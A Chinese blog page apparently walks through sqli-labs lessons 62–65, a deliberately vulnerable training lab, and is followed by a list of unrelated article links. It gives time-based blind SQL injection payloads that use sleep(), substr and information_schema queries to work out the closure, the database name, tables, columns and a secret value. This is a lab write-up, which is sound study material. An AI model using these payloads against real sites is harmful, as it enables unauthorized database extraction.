当前位置: 首页 > news >正文

sqli-labs-master/Less-62~Less-65

Less-62

这一关开始就是使用时间盲注了,并且它规定查130次。

首先,我们判断他的闭合方式。

?id=1')and sleep(3)--%20

页面延时了,说明闭合成功了。

下面我们判断它的数据库名的长度

?id=1')and if(length(database())>10,sleep(1),1)--%20

当长度大于9时,页面延时,大于10时页面不延时,说明数据库的长度为10

?id=1')and if(substr(database(),1,1)='c',sleep(1),1)--%20

截取数据库从第一位开始截取一位,如果是c,则sleep一秒,依次类推,直到判断出数据库的名字为challenges为止。

接下来就是判断表名了。

?id=1')and if(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='m',sleep(3),1)--%20

以此类推,直到判断出表名为止。

接下来爆字段

?id=1')and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='mss5jm6plq' limit 2,1),1,1)='s',sleep(3),1)--%20

下面以此类推,直到判断出需要的字段为止。

下面面爆字段信息

?id=1')and if(substr((select secret_FT6J from mss5jm6plq),1,1)='k',sleep(3),1)--%20

然后,将我们查出来的密钥填到下面。

Less-63

这一关和以前一样,还是先判断闭合

?id=1' and sleep(3)--%20

接下来参考上面即可。

Less-64

?id=1))and sleep(3)--%20

只是闭合方式不同。其他参考上一关即可。

Less-65

?id=1")and sleep(3)--%20

http://www.dtcms.com/a/324288.html

相关文章:

  • 01.【面试题】在SpringBoot中如何实现多数据源配置
  • (Python)爬虫进阶(Python爬虫教程)(CSS选择器)
  • 2025年全国青少年信息素养大赛Scratch编程践挑战赛-小低组-初赛-模拟题
  • Linux系统编程Day11 -- 进程状态的优先级和特性
  • 移动端音频处理实践:59MB变声应用的技术实现分析
  • 机器学习-增加样本、精确率与召回率
  • LeetCode 869.重新排序得到 2 的幂:哈希表+排序(一次初始化)
  • Android 16 KB页面大小适配的权威技术方案总结
  • Android快速视频解码抽帧FFmpegMediaMetadataRetriever,Kotlin(2)
  • Android 开发问题:Invalid id; ID definitions must be of the form @+id/ name
  • 010601抓包工具及证书安装-基础入门-网络安全
  • 浅谈 A2A SDK 核心组件
  • 电脑本地摄像头做成rtsp流调用测试windows系统中
  • 【Docker实战】将Django应用容器化的完整指南
  • Pytorch深度学习框架实战教程-番外篇10-PyTorch中的nn.Linear详解
  • Linux-静态配置ip地址
  • 怎么将视频转换成字幕python作为工具
  • 计算机视觉(CV)——pytorch张量基本使用
  • 深入解析Java中的String、StringBuilder与StringBuffer:特性、区别与最佳实践
  • Gin 框架中的模板引擎使用指南
  • LeetCode 每日一题 2025/8/4-2025/8/10
  • mpv core_thread pipeline
  • c语言常见错误
  • MySQL 处理重复数据详细说明
  • ADK(Agent Development Kit)【2】调用流程详解
  • 智慧交通-道路积雪识别分割数据集labelme格式1985张2类别
  • python Flask简单图书管理 API
  • 【Linux知识】Linux grep 命令全面使用指南
  • 祝融号无线电工作频段
  • C++入门自学Day8-- 初识Vector